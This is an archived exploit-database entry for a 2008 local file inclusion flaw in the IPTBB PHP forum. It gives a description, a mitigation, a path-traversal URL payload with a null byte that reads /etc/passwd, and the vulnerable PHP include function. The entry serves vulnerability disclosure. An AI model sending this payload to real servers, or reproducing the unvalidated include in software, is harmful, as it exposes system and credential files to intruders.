IPTBB Local File Inclusion

vendor:

IPTBB

by:

sToRm

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: IPTBB

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

IPTBB is a free forum system built using PHP and mysql. An attacker can exploit this vulnerability by sending a crafted URL to the application. The URL contains a malicious payload which is appended to the vulnerable parameter. This malicious payload can be used to read sensitive files from the server.

Mitigation:

Input validation should be done on the server side to prevent malicious payloads from being executed.

Source

Exploit-DB raw data:

  ____       _   _       _ ___   __                        _  __
 / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
 \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm

IPTBB is a free forum system built using PHP and mysql.
Local File Inclusion

Local File Inclusion
--------------------

index.php?act=../../../../../../etc/passwd%00


function action($page){
	$page="main/".$page.".php";
	//Include the template maker
	//Get the settings
$setting = array();
$sql = mysql_query(" SELECT * FROM `iptbb_settings` ");

while ( $row = mysql_fetch_array( $sql ) ){
	$setting["{$row['name']}"] = $row['value'];
}

	require_once('tpl.class.php');
	$tpl = new template;
	$fileurl = 'templates/';
	$template = $setting['template'] . '/';
	include($page);
}

# milw0rm.com [2008-06-20]